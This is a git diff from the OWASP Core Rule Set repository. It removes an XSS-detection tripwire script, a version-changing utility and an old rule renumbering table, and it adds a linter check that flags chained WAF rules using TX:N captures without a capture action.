-      }
-    }
-    return xmlreq;
-  };
-
-  XSSTripwire.proxy = function(obj, name, report_function_name, exec_original) {
-    var proxy = obj[name];
-    obj[name] = function() {
-      // URL of the page to notify, in the event of a detected XSS event:
-      XSSTripwire.ReportURL = "xss-tripwire-report?function=" + encodeURIComponent(report_function_name);
-
-      XSSTripwire.report();
-
-      if (exec_original) {
-        return proxy.apply(this, arguments);
-      }
-    };
-    XSSTripwire.lockdown(obj, name);
-  };
-
-  XSSTripwire.proxy(window, 'alert', 'window.alert', true);
-  XSSTripwire.proxy(window, 'confirm', 'window.confirm', true);
-  XSSTripwire.proxy(window, 'prompt', 'window.prompt', true);
-  XSSTripwire.proxy(window, 'unescape', 'unescape', true);
-  XSSTripwire.proxy(document, 'write', 'document.write', true);
-  XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true);
-
-})();
diff --git a/util/change-version/README.md b/util/change-version/README.md
deleted file mode 100644
index 7867d3111..000000000
--- a/util/change-version/README.md
+++ /dev/null
@@ -1,113 +0,0 @@
-# Change version in CRS
-
-This page describes how can you change the version strings in CRS rules.
-
-## Goals
-
-The problem is change the version string in CRS rules isn't trivial. Version string used for mark all rule by the `ver` action, mark the whole file in a comment, or mark the rule set with `SecComponentSignature`. Few examples:
-
-* in a rule: `SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass"`
-* comment: `# OWASP ModSecurity Core Rule Set ver.3.3.0`
-* config directive: `SecComponentSignature "OWASP_CRS/3.3.0"`
-
-There are many other pattern which look-a-like version string, but that isn't it.
-
-The main task is replace only the real version strings by the new one.
-
-The Python script below helps to do that on the whole rule set or any unique file.
-
-## Prerequisites
-
-* Python3 interpreter
-* [msc_pyparser](https://github.com/digitalwave/msc_pyparser)
-* CRS rule set
-
-You can install the `msc_pyparser` through PIP - that's the recommended method, see the [instructions](https://github.com/digitalwave/msc_pyparser#installing-using-pip3).
-
-If you already have this package, don't forget to update it before you start the work:
-
-```bash
-python3 -m pip install --upgrade msc_pyparser
-```
-
-## Usage
-
-The script expects three mandatory and one optional arguments:
-
-* input file or directory
-* output **directory**
-* version string for `ver` actions and `SecComponentSignature` - these are always the same
-* and optionally, the version string for comments
-
-Please note that the input can be a single file (eg. 'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is always a **directory** where the script puts the transformed file or files.
-
-### Run the script
-
-Consider you want to change only the `ver` and `SecComponentSignature` values by a new one, eg: `OWASP_CRS/3.4.0-dev`. The current value is `OWASP_CRS/3.3.0`. The next command will solve this:
-
-```bash
-mkdir /path/to/coreruleset/rules_new
-$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev"
-Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf
-Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf
-...
-Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
-Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf
-```
-
-The new files will placed under the `/path/to/coreruleset/rules_new`, now make a diff:
-
-```bash
-$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done
-28c28
-< SecComponentSignature "OWASP_CRS/3.3.0"
----
-> SecComponentSignature "OWASP_CRS/3.4.0-dev"
-61c61
-<     ver:'OWASP_CRS/3.3.0',\
----
->     ver:'OWASP_CRS/3.4.0-dev',\
-79c79
-<     ver:'OWASP_CRS/3.3.0',\
----
->     ver:'OWASP_CRS/3.4.0-dev',\
-...
-```
-
-As you can see, the comments have been left untouched.
-
-In the next example, we can replace them too:
-
-```bash
-$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev"
-Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf
-Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf
-...
-Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
-Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf
-```
-
-Run the diff again:
-
-```bash
-$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done
-2c2
-< # OWASP ModSecurity Core Rule Set ver.3.3.0
----
-> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev
-28c28
-< SecComponentSignature "OWASP_CRS/3.3.0"
----
-> SecComponentSignature "OWASP_CRS/3.4.0-dev"
-61c61
-<     ver:'OWASP_CRS/3.3.0',\
----
->     ver:'OWASP_CRS/3.4.0-dev',\
-79c79
-<     ver:'OWASP_CRS/3.3.0',\
----
->     ver:'OWASP_CRS/3.4.0-dev',\
-...
-```
-
-As you can see, the version string at the end of comment line has changed in line 2.
diff --git a/util/change-version/README.txt b/util/change-version/README.txt
deleted file mode 100644
index 984a91c57..000000000
--- a/util/change-version/README.txt
+++ /dev/null
@@ -1,117 +0,0 @@
-Change version in CRS
-=====================
-
-This page describes how can you change the version strings in CRS rules.
-
-
-Goals
------
-The problem is change the version string in CRS rules isn't trivial. Version
-string used for mark all rule by the ver action, mark the whole file in a
-comment, or mark the rule set with SecComponentSignature. Few examples:
-
- * in a rule: SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass"
- * comment: # OWASP ModSecurity Core Rule Set ver.3.3.0
- * config directive: SecComponentSignature "OWASP_CRS/3.3.0"
-
-There are many other pattern which look-a-like version string, but that
-isn't it.
-
-The main task is replace only the real version strings by the new one.
-
-The Python script below helps to do that on the whole rule set or any unique
-file.
-
-Prerequisites
--------------
- * Python3 interpreter
- * msc_pyparser
- * CRS rule set
-
-You can install the msc_pyparser through PIP - that's the recommended method,
-see the instructions.
-
-If you already have this package, don't forget to update it before you start
-the work:
-
-python3 -m pip install --upgrade msc_pyparser
-
-
-Usage
------
-The script expects three mandatory and one optional arguments:
-
-* input file or directory
-* output directory
-* version string for ver actions and SecComponentSignature - these are always
-  the same and optionally, the version string for comments
-
-Please note that the input can be a single file (eg.
-'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta
-name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is
-always a directory where the script puts the transformed file or files.
-
-Run the script
---------------
-Consider you want to change only the ver and SecComponentSignature values by a
-new one, eg: OWASP_CRS/3.4.0-dev. The current value is OWASP_CRS/3.3.0. The
-next command will solve this:
-
-mkdir /path/to/coreruleset/rules_new
-$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev"
-Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf
-Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf
-...
-Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
-Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf
-
-The new files will placed under the /path/to/coreruleset/rules_new, now make a diff:
-
-$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done
-28c28
-< SecComponentSignature "OWASP_CRS/3.3.0"
----
-> SecComponentSignature "OWASP_CRS/3.4.0-dev"
-61c61
-<     ver:'OWASP_CRS/3.3.0',\
----
->     ver:'OWASP_CRS/3.4.0-dev',\
-79c79
-<     ver:'OWASP_CRS/3.3.0',\
----
->     ver:'OWASP_CRS/3.4.0-dev',\
-...
-
-As you can see, the comments have been left untouched.
-
-In the next example, we can replace them too:
-
-$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev"
-Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf
-Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf
-...
-Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
-Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf
-
-Run the diff again:
-
-$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done
-2c2
-< # OWASP ModSecurity Core Rule Set ver.3.3.0
----
-> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev
-28c28
-< SecComponentSignature "OWASP_CRS/3.3.0"
----
-> SecComponentSignature "OWASP_CRS/3.4.0-dev"
-61c61
-<     ver:'OWASP_CRS/3.3.0',\
----
->     ver:'OWASP_CRS/3.4.0-dev',\
-79c79
-<     ver:'OWASP_CRS/3.3.0',\
----
->     ver:'OWASP_CRS/3.4.0-dev',\
-...
-
-As you can see, the version string at the end of comment line has changed in line 2.
diff --git a/util/change-version/change-version.py b/util/change-version/change-version.py
deleted file mode 100755
index 6e39a8e71..000000000
--- a/util/change-version/change-version.py
+++ /dev/null
@@ -1,105 +0,0 @@
-#!/usr/bin/env python3
-
-import sys
-import glob
-import msc_pyparser
-import os.path
-import re
-
-class FileTransform(object):
-    def __init__(self, data):
-        self.data        = data
-        self.cverpatt    = "ver\.\d+\.\d+\.\d+$"
-        self.re_cverpatt = re.compile(self.cverpatt)
-
-    def change_version(self, version, cversion):
-        # iterate through AST items
-        # self.data: the parsed structure
-        for d in self.data:
-            # id the item has 'actions' then we can check the 'ver' key
-            if "actions" in d:
-                aidx = 0
-                while aidx < len(d['actions']):
-                    a = d['actions'][aidx]
-                    # if we found one, replace the value
-                    if a['act_name'] == "ver":
-                        a['act_arg'] = version
-                    aidx += 1
-            else:
-                # replace SecComponentSignature by same version string
-                if d['type'].lower() == "seccomponentsignature":
-                    d['arguments'][0]['argument'] = version
-
-                # replace the versions in comments if cversion exists
-                if cversion is not None:
-                    if d['type'].lower() == "comment" and self.re_cverpatt.search(d['argument']):
-                        d['argument'] = re.sub(self.cverpatt, "ver.%s" % (cversion), d['argument'])
-
-class FileHandler(object):
-    def __init__(self, **kwargs):
-        for key, value in kwargs.items():
-            setattr(self, key, value)
-        if not hasattr(self, 'cversion'):
-            self.cversion = None
-
-        self.output = self.output.rstrip("/") + "/"
-
-        # iterate through the list of files
-        for f in glob.glob(self.input):
-            print(f"Working with file: %s" % (f))
-            # read the file content
-            try:
-                with open(f) as file:
-                    data = file.read()
-            except:
-                print("Exception caught - ", sys.exc_info())
-                sys.exit(1)
-
-            # build AST from content
-            try:
-                mparser = msc_pyparser.MSCParser()
-                mparser.parser.parse(data)
-            except:
-                print(sys.exc_info()[1])
-                sys.exit(1)
-
-            # change version and comment version if exists
-            try:
-                t = FileTransform(mparser.configlines)
-                t.change_version(self.version, self.cversion)
-            except:
-                print(sys.exc_info()[1])
-                sys.exit(1)
-
-            # save the new file
-            try:
-                mwriter = msc_pyparser.MSCWriter(mparser.configlines)
-                output = os.path.join(self.output, os.path.basename(f).lstrip("/"))
-                with open(output, "w") as file:
-                    mwriter.generate()
-                    # add extra new line at the end of file
-                    mwriter.output.append("")
-                    file.write("\n".join(mwriter.output))
-            except:
-                print("Exception caught - ", sys.exc_info())
-                sys.exit(1)
-
-if len(sys.argv) < 4:
-    print("Argument missing!")
-    print("Use: %s rule.conf /path/to/output/directory version" % sys.argv[0])
-    print("     %s \"/path/to/rules/*.conf\" /path/to/output/directory version [comment_version]" % sys.argv[0])
-    print("Example:")
-    print("     mkdir ../../rulestmp")
-    print("     %s \"../../rules/*.conf\" ../../rulestmp \"OWASP_CRS/3.4.0-dev\" \"3.4.0-dev\"" % sys.argv[0])
-    sys.exit(1)
-
-args = {
-    'input'   : sys.argv[1],
-    'output'  : sys.argv[2],
-    'version' : sys.argv[3]
-}
-
-if len(sys.argv) > 4:
-    args['cversion'] = sys.argv[4]
-
-fh = FileHandler(**args)
diff --git a/util/crs-rules-check/README.md b/util/crs-rules-check/README.md
index 530783aa7..ad06551e9 100644
--- a/util/crs-rules-check/README.md
+++ b/util/crs-rules-check/README.md
@@ -55,6 +55,11 @@ Second, the script loops over each of the parsed structures. Each iteration cons
 * **Check rule has a `ver` action with correct version** - Every rule must have `ver` action with correct value
     * script accepts `-v` or `--version` argument if you want to pass it manually
     * if no `-v` was given, the script tries to extract the version from result of `git describe --tags`
+* **Check if the rule uses any `TX:N` target in a chained rule then there must be a `capture` action** - Consider the rule is a chained rule and not the first rule uses the `TX:1` target
+    * this means we want to check the previously rule's result
+    * which is produced by `capture`
+    * if there is no previously `capture`, then it means the next `TX:1` will uses a previously produced captured value
+
 
 Finally, the script prints a report of all unused TX variables. Usually, unused TX variables occur when a rule creates a TX variable (e.g., `setvar:tx.foo=1`) but the value of the variable is never used anywhere else. This will only be revealed after the script has checked all rules.
 
@@ -550,3 +555,72 @@ End of checking parsed rules
 Cumulated report about unused TX variables
  No unused TX variable
 ```
+
+### Test 13 - Check if a chained rule uses `TX:1` target then it has a previously `capture` action
+
+
+```
+# no need 'capture' action because the TX:1, but there is no chain action
+SecRule ARGS "@rx TX:1" \
+    "id:1,\
+    phase:2,\
+    deny,\
+    t:none,\
+    nolog,\
+    tag:OWASP_CRS,\
+    ver:'OWASP_CRS/4.7.0-dev'"
+
+# normal use
+SecRule ARGS "@rx attack" \
+    "id:2,\
+    phase:2,\
+    deny,\
+    capture,\
+    t:none,\
+    nolog,\
+    tag:OWASP_CRS,\
+    ver:'OWASP_CRS/4.7.0-dev',\
+    chain"
+    SecRule TX:1 "@eq attack"
+
+# invalid use
+SecRule ARGS "@rx attack" \
+    "id:3,\
+    phase:2,\
+    deny,\
+    t:none,\
+    nolog,\
+    tag:OWASP_CRS,\
+    ver:'OWASP_CRS/4.7.0-dev',\
+    chain"
+    SecRule TX:0 "@eq attack"
+```
+
+Rule 1 is a "regular" rule, it can use `TX:1` without any restriction.
+Rule 2 is the valid form.
+Rule 3 is a chained rule and it uses `TX:0` in second rule, but first rule does not have `capture`.
+
+```
+$ ./rules-check.py -r examples/test13.conf -t ../APPROVED_TAGS -v "4.7.0-dev"
+Config file: examples/test13.conf
+ Parsing ok.
+Checking parsed rules...
+examples/test13.conf
+ Ignore case check ok.
+ Action order check ok.
+ Indentation check ok.
+ no 'ctl:auditLogParts' action found.
+ no duplicate id's
+ paranoia-level tags are correct.
+ PL anomaly_scores are correct.
+ All TX variables are set.
+ No new tags added.
+ No t:lowercase and (?i) flag used.
+ No rule without OWASP_CRS tag.
+ No rule without correct ver action.
+ There are one or more rules using TX.N without capture action.
+  file=examples/test13.conf, line=34, endLine=34, title=capture is missing: rule uses TX.N without capture; rule id: 3'
+End of checking parsed rules
+Cumulated report about unused TX variables
+ No unused TX variable
+```
diff --git a/util/crs-rules-check/examples/test13.conf b/util/crs-rules-check/examples/test13.conf
new file mode 100644
index 000000000..51f259f5d
--- /dev/null
+++ b/util/crs-rules-check/examples/test13.conf
@@ -0,0 +1,35 @@
+
+# no need 'capture' action because the TX:1, but there is no chain action
+SecRule ARGS "@rx TX:1" \
+    "id:1,\
+    phase:2,\
+    deny,\
+    t:none,\
+    nolog,\
+    tag:OWASP_CRS,\
+    ver:'OWASP_CRS/4.7.0-dev'"
+
+# normal use
+SecRule ARGS "@rx attack" \
+    "id:2,\
+    phase:2,\
+    deny,\
+    capture,\
+    t:none,\
+    nolog,\
+    tag:OWASP_CRS,\
+    ver:'OWASP_CRS/4.7.0-dev',\
+    chain"
+    SecRule TX:1 "@eq attack"
+
+# invalid use
+SecRule ARGS "@rx attack" \
+    "id:3,\
+    phase:2,\
+    deny,\
+    t:none,\
+    nolog,\
+    tag:OWASP_CRS,\
+    ver:'OWASP_CRS/4.7.0-dev',\
+    chain"
+    SecRule TX:0 "@eq attack"
diff --git a/util/crs-rules-check/rules-check.py b/util/crs-rules-check/rules-check.py
index 2c7850be5..26fb68d40 100755
--- a/util/crs-rules-check/rules-check.py
+++ b/util/crs-rules-check/rules-check.py
@@ -83,6 +83,7 @@ def __init__(self, data, txvars):
         self.ignorecase     = []    # list of combinations of t:lowercase and (?i)
         self.nocrstags      = []    # list of rules without tag:OWASP_CRS
         self.noveract       = []    # list of rules without ver action or incorrect ver
+        self.nocaptact      = []    # list of rules which uses TX.N without previous 'capture'
 
         self.re_tx_var      = re.compile(r"%\{\}")
 
@@ -373,7 +374,7 @@ def check_tx_variable(self, fname):
                     if oparg:
                         for o in oparg:
                             o = o.lower()
-                            o = re.sub(r"tx\.", "", o, re.I)
+                            o = re.sub(r"tx\.", "", o, count = 0, flags = re.I)
                             if (o not in self.globtxvars or phase < self.globtxvars[o]['phase']) and \
                               not re.match(r"^\d$", o) and \
                               not re.match(r"/.*/", o) and \
@@ -431,7 +432,7 @@ def check_tx_variable(self, fname):
                                 if has_disruptive == True:
                                     self.globtxvars[v['variable_part'].lower()]['used'] = True
                                 if len(self.undef_txvars) > 0 and self.undef_txvars[-1]['var'] == v['variable_part'].lower():
-                                    del(self.undef_txvars[-1])
+                                    del self.undef_txvars[-1]
                 if chained == False:
                     check_exists   = None
                     has_disruptive = False
@@ -724,6 +725,66 @@ def check_ver_action(self, version):
                                 'message': f"rule's 'ver' action has incorrect value; rule id: {ruleid}, version: '{ruleversion}', expected: '{crsversion}'"
                             })
 
+    def check_capture_action(self):
+        """
+        check that every chained rule has a `capture` action if it uses TX.N variable
+        """
+        chained            = False
+        ruleid             = 0
+        chainlevel         = 0
+        capture_level      = None
+        re_number          = re.compile(r"^\d$")
+        has_capture        = False
+        use_captured_var   = False
+        captured_var_chain_level = 0
+        for d in self.data:
+            # only the SecRule object is relevant
+            if d['type'].lower() == "secrule":
+                for v in d['variables']:
+                    if v['variable'].lower() == 'tx' and re_number.match(v['variable_part']):
+                        if use_captured_var == False: # only the first occurrence required
+                            use_captured_var   = True
+                            captured_var_chain_level = chainlevel
+                if "actions" in d:
+                    aidx       = 0        # stores the index of current action
+                    if chained == False:
+                        ruleid     = 0
+                        chainlevel = 0
+                    else:
+                        chained    = False
+                    while aidx < len(d['actions']):
+                        # read the action into 'a'
+                        a = d['actions'][aidx]
+                        if a['act_name'] == "id":
+                            ruleid = int(a['act_arg'])
+                        if a['act_name'] == "chain":
+                            chained = True
+                            chainlevel += 1
+                        if a['act_name'] == "capture" :
+                            capture_level = chainlevel
+                            has_capture   = True
+                        aidx += 1
+                    if ruleid > 0 and chained == False: # end of chained rule
+                        if use_captured_var == True:
+                            # we allow if target with TX:N is in the first rule
+                            # of a chained rule without 'capture'
+                            if captured_var_chain_level > 0:
+                                if has_capture == False or captured_var_chain_level < capture_level:
+                                    self.nocaptact.append({
+                                        'ruleid' : ruleid,
+                                        'line'   : a['lineno'],
+                                        'endLine': a['lineno'],
+                                        'message': f"rule uses TX.N without capture; rule id: {ruleid}'"
+                                    })
+                        # clear variables
+                        chained = False
+                        chainlevel = 0
+                        has_capture = False
+                        capture_level = 0
+                        captured_var_chain_level = 0
+                        use_captured_var = False
+                        ruleid = 0
+
 def remove_comments(data):
     """
     In some special cases, remove the comments from the beginning of the lines.
@@ -786,16 +847,16 @@ def remove_comments(data):
 
 def errmsg(msg):
     if oformat == "github":
-        print("::error %s" % (msg))
+        print("::error::%s" % (msg))
     else:
         print(msg)
 
 def errmsgf(msg):
     if oformat == "github":
         if 'message' in msg and msg['message'].strip() != "":
-            print("::error%sfile={file},line={line},endLine={endLine},title={title}: {message}".format(**msg) % (msg['indent']*" "))
+            print("::error%sfile={file},line={line},endLine={endLine},title={title}:: {message}".format(**msg) % (msg['indent']*" "))
         else:
-            print("::error%sfile={file},line={line},endLine={endLine},title={title}".format(**msg) % (msg['indent']*" "))
+            print("::error%sfile={file},line={line},endLine={endLine},title={title}::".format(**msg) % (msg['indent']*" "))
     else:
         if 'message' in msg and msg['message'].strip() != "":
             print("%sfile={file}, line={line}, endLine={endLine}, title={title}: {message}".format(**msg) % (msg['indent']*" "))
@@ -804,7 +865,7 @@ def errmsgf(msg):
 
 def msg(msg):
     if oformat == "github":
-        print("::debug %s" % (msg))
+        print("::debug::%s" % (msg))
     else:
         print(msg)
 
@@ -850,7 +911,7 @@ def generate_version_string():
         # if no --version/-v was given, get version from git describe --tags output
         crsversion = generate_version_string()
     else:
-        crsversion = args.version
+        crsversion = args.version.strip()
     # if no "OWASP_CRS/" prefix, append it
     if not crsversion.startswith("OWASP_CRS/"):
         crsversion = "OWASP_CRS/" + crsversion
@@ -1100,17 +1161,29 @@ def generate_version_string():
                 errmsgf(a)
                 retval = 1
         ### check for ver action
-        # c.check_ver_action(crsversion)
-        # if len(c.noveract) == 0:
-        #     msg(" No rule without correct ver action.")
-        # else:
-        #     errmsg(" There are one or more rules without ver action.")
-        #     for a in c.noveract:
-        #         a['indent'] = 2
-        #         a['file']   = f
-        #         a['title']  = "ver is missing / incorrect"
-        #         errmsgf(a)
-        #         retval = 1
+        c.check_ver_action(crsversion)
+        if len(c.noveract) == 0:
+            msg(" No rule without correct ver action.")
+        else:
+            errmsg(" There are one or more rules without ver action.")
+            for a in c.noveract:
+                a['indent'] = 2
+                a['file']   = f
+                a['title']  = "ver is missing / incorrect"
+                errmsgf(a)
+                retval = 1
+
+        c.check_capture_action()
+        if len(c.nocaptact) == 0:
+            msg(" No rule uses TX.N without capture action.")
+        else:
+            errmsg(" There are one or more rules using TX.N without capture action.")
+            for a in c.nocaptact:
+                a['indent'] = 2
+                a['file']   = f
+                a['title']  = "capture is missing"
+                errmsgf(a)
+                retval = 1
 
     msg("End of checking parsed rules")
     msg("Cumulated report about unused TX variables")
diff --git a/util/crs2-renumbering/IdNumbering.csv b/util/crs2-renumbering/IdNumbering.csv
deleted file mode 100644
index 269b88af8..000000000
--- a/util/crs2-renumbering/IdNumbering.csv
+++ /dev/null
@@ -1,1132 +0,0 @@
-200000,000000
-200121,000000
-200273,000000
-200280,000000
-200281,000000
-200287,000000
-200289,000000
-200290,000000
-200299,000000
-200316,000000
-200333,000000
-200337,000000
-200350,000000
-200351,000000
-200366,000000
-200367,000000
-200368,000000
-200369,000000
-200370,000000
-200371,000000
-200372,000000
-200373,000000
-200374,000000
-200375,000000
-200376,000000
-200377,000000
-200378,000000
-200379,000000
-200381,000000
-200382,000000
-200383,000000
-200384,000000
-200385,000000
-200386,000000
-200387,000000
-200388,000000
-200389,000000
-200390,000000
-200391,000000
-200392,000000
-200394,000000
-200395,000000
-200396,000000
-200397,000000
-200398,000000
-200399,000000
-200400,000000
-200401,000000
-200402,000000
-200403,000000
-200404,000000
-200405,000000
-200406,000000
-200407,000000
-200408,000000
-200409,000000
-200410,000000
-200411,000000
-200412,000000
-200413,000000
-200414,000000
-200415,000000
-200416,000000
-200417,000000
-200418,000000
-200419,000000
-200420,000000
-200421,000000
-200422,000000
-200423,000000
-200424,000000
-200425,000000
-200426,000000
-200427,000000
-200428,000000
-200429,000000
-200430,000000
-200431,000000
-200432,000000
-200433,000000
-200434,000000
-200435,000000
-200436,000000
-200437,000000
-200438,000000
-200439,000000
-200440,000000
-200441,000000
-200442,000000
-200443,000000
-200445,000000
-200446,000000
-200447,000000
-200448,000000
-200449,000000
-200450,000000
-200451,000000
-200452,000000
-200453,000000
-200454,000000
-200455,000000
-200456,000000
-200457,000000
-200458,000000
-200459,000000
-200460,000000
-200461,000000
-200462,000000
-200463,000000
-200464,000000
-200465,000000
-200466,000000
-200467,000000
-200468,000000
-200469,000000
-200470,000000
-200471,000000
-200472,000000
-200473,000000
-200474,000000
-200475,000000
-200476,000000
-200477,000000
-200478,000000
-200479,000000
-200480,000000
-200481,000000
-200482,000000
-200483,000000
-200484,000000
-200485,000000
-200486,000000
-200487,000000
-200488,000000
-200489,000000
-200490,000000
-200491,000000
-200492,000000
-200493,000000
-200494,000000
-200495,000000
-200496,000000
-200497,000000
-200498,000000
-200499,000000
-200500,000000
-200501,000000
-200502,000000
-200503,000000
-200504,000000
-200505,000000
-200506,000000
-200507,000000
-200508,000000
-200509,000000
-200510,000000
-200511,000000
-200512,000000
-200513,000000
-200514,000000
-200515,000000
-200516,000000
-200517,000000
-200518,000000
-200519,000000
-200520,000000
-200521,000000
-200522,000000
-200523,000000
-200524,000000
-200525,000000
-200526,000000
-200527,000000
-200528,000000
-200529,000000
-200530,000000
-200532,000000
-200533,000000
-200534,000000
-200535,000000
-200536,000000
-200537,000000
-200538,000000
-200539,000000
-200540,000000
-200541,000000
-200542,000000
-200543,000000
-200544,000000
-200545,000000
-200546,000000
-200547,000000
-200548,000000
-200549,000000
-200550,000000
-200551,000000
-200552,000000
-200553,000000
-200554,000000
-200555,000000
-200556,000000
-200557,000000
-200558,000000
-200559,000000
-200560,000000
-200561,000000
-200562,000000
-200563,000000
-200564,000000
-200565,000000
-200566,000000
-200567,000000
-200568,000000
-200569,000000
-200570,000000
-200571,000000
-200572,000000
-200573,000000
-200574,000000
-200575,000000
-200576,000000
-200577,000000
-200578,000000
-200579,000000
-200580,000000
-200581,000000
-200582,000000
-200583,000000
-200584,000000
-200585,000000
-200586,000000
-200587,000000
-200588,000000
-200589,000000
-200590,000000
-200591,000000
-200592,000000
-200593,000000
-200594,000000
-200595,000000
-200596,000000
-200597,000000
-200598,000000
-200599,000000
-200600,000000
-200601,000000
-200602,000000
-200603,000000
-200604,000000
-200605,000000
-200606,000000
-200607,000000
-200608,000000
-200609,000000
-200610,000000
-200611,000000
-200612,000000
-200613,000000
-200614,000000
-200615,000000
-200616,000000
-200617,000000
-200618,000000
-200619,000000
-200620,000000
-200621,000000
-200622,000000
-200623,000000
-200624,000000
-200625,000000
-200626,000000
-200627,000000
-200628,000000
-200629,000000
-200630,000000
-200631,000000
-200632,000000
-200633,000000
-200634,000000
-200635,000000
-200645,000000
-200646,000000
-200647,000000
-200648,000000
-200649,000000
-200650,000000
-200651,000000
-200652,000000
-200653,000000
-200654,000000
-200655,000000
-200656,000000
-200657,000000
-200658,000000
-200659,000000
-200660,000000
-200661,000000
-200662,000000
-200663,000000
-200664,000000
-200665,000000
-200666,000000
-200667,000000
-200668,000000
-200669,000000
-200670,000000
-200671,000000
-200673,000000
-200674,000000
-200675,000000
-200676,000000
-200677,000000
-200678,000000
-200679,000000
-200680,000000
-200681,000000
-200682,000000
-200683,000000
-200684,000000
-200685,000000
-200686,000000
-200687,000000
-200688,000000
-200689,000000
-200690,000000
-200692,000000
-200693,000000
-200694,000000
-200695,000000
-200696,000000
-200697,000000
-200698,000000
-200699,000000
-200700,000000
-200701,000000
-200702,000000
-200703,000000
-200704,000000
-200705,000000
-200706,000000
-200707,000000
-200708,000000
-200709,000000
-200710,000000
-200711,000000
-200712,000000
-200713,000000
-200714,000000
-200718,000000
-200719,000000
-200720,000000
-200721,000000
-200722,000000
-200723,000000
-200724,000000
-200725,000000
-200726,000000
-200727,000000
-200728,000000
-200729,000000
-200730,000000
-200731,000000
-200732,000000
-200733,000000
-200734,000000
-200735,000000
-200736,000000
-200737,000000
-200738,000000
-200739,000000
-200740,000000
-200741,000000
-200742,000000
-200743,000000
-200744,000000
-200745,000000
-200746,000000
-200747,000000
-200748,000000
-200749,000000
-200751,000000
-200752,000000
-200753,000000
-200754,000000
-200755,000000
-200756,000000
-200789,000000
-200865,000000
-200868,000000
-200872,000000
-200882,000000
-200883,000000
-200884,000000
-200885,000000
-200887,000000
-200888,000000
-200889,000000
-200890,000000
-200892,000000
-200893,000000
-200896,000000
-200897,000000
-200899,000000
-200901,000000
-200905,000000
-200906,000000
-200907,000000
-200908,000000
-200910,000000
-200912,000000
-200914,000000
-200916,000000
-200917,000000
-200918,000000
-200919,000000
-200922,000000
-200923,000000
-200930,000000
-200931,000000
-200932,000000
-200933,000000
-200936,000000
-200937,000000
-200938,000000
-200939,000000
-200941,000000
-200942,000000
-200943,000000
-200945,000000
-200946,000000
-200950,000000
-200959,000000
-200964,000000
-200965,000000
-200966,000000
-200967,000000
-200969,000000
-200971,000000
-200972,000000
-200973,000000
-200974,000000
-200975,000000
-200976,000000
-200978,000000
-200979,000000
-200983,000000
-200984,000000
-200987,000000
-200988,000000
-200989,000000
-200990,000000
-200991,000000
-200992,000000
-200993,000000
-200994,000000
-200995,000000
-200996,000000
-200997,000000
-200999,000000
-201001,000000
-201002,000000
-201003,000000
-201004,000000
-201007,000000
-201008,000000
-201009,000000
-201012,000000
-201013,000000
-201014,000000
-201016,000000
-201017,000000
-201018,000000
-201019,000000
-201020,000000
-201022,000000
-201025,000000
-201026,000000
-201027,000000
-201034,000000
-201035,000000
-201036,000000
-201046,000000
-201047,000000
-201048,000000
-201055,000000
-201056,000000
-201061,000000
-201062,000000
-201063,000000
-201064,000000
-201065,000000
-201066,000000
-201070,000000
-201071,000000
-201072,000000
-201075,000000
-201077,000000
-201078,000000
-201080,000000
-201083,000000
-201084,000000
-201085,000000
-201086,000000
-201092,000000
-201094,000000
-201095,000000
-201097,000000
-201098,000000
-201099,000000
-201100,000000
-201101,000000
-201102,000000
-201104,000000
-201105,000000
-201106,000000
-201107,000000
-201108,000000
-201109,000000
-201110,000000
-201111,000000
-201113,000000
-201114,000000
-201115,000000
-201116,000000
-201117,000000
-201119,000000
-201120,000000
-201121,000000
-201125,000000
-201126,000000
-201127,000000
-201137,000000
-201138,000000
-201142,000000
-201145,000000
-201155,000000
-201156,000000
-201157,000000
-201166,000000
-201167,000000
-201172,000000
-201173,000000
-201182,000000
